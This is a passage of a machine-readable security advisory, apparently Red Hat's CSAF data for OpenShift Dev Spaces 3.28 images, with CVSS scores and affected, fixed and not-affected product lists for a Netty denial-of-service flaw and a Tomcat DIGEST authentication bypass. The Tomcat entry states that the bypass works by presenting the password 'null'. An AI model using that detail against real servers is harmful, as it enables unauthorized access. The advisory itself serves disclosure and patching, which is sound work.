"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression"
},
{
"cve": "CVE-2026-43512",
"cwe": {
"id": "CWE-303",
"name": "Incorrect Implementation of Authentication Algorithm"
},
"discovery_date": "2026-05-12T16:01:26.008892+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2476511"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Tomcat. When DIGEST authentication was configured, any user not known to the configured Realm would be authenticated if they presented the password \"null\". This allows a remote attacker to bypass security controls.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tomcat-coyote: Apache Tomcat: Authentication bypass via digest authentication",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate flaw in Apache Tomcat allows an authentication bypass when DIGEST authentication is configured. An attacker can authenticate as any unknown user by providing the password \u0027null\u0027, potentially gaining unauthorized access to applications protected by DIGEST authentication. Red Hat products are only affected if they are configured to use DIGEST authentication, which is not a common, out of the box and expected configuration for Production environments. \n\nFurthermore, because the unknown user is not mapped to any valid realm roles, their access is still restricted by standard application authorization constraints, significantly limiting the actual impact.\n\nThe unknown user is not mapped to any existing user, which means, it does not steal credentials nor impersonate an existing user. This new user is expected to have the minimum possible authentication and authorization range within the realm inherited roles.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
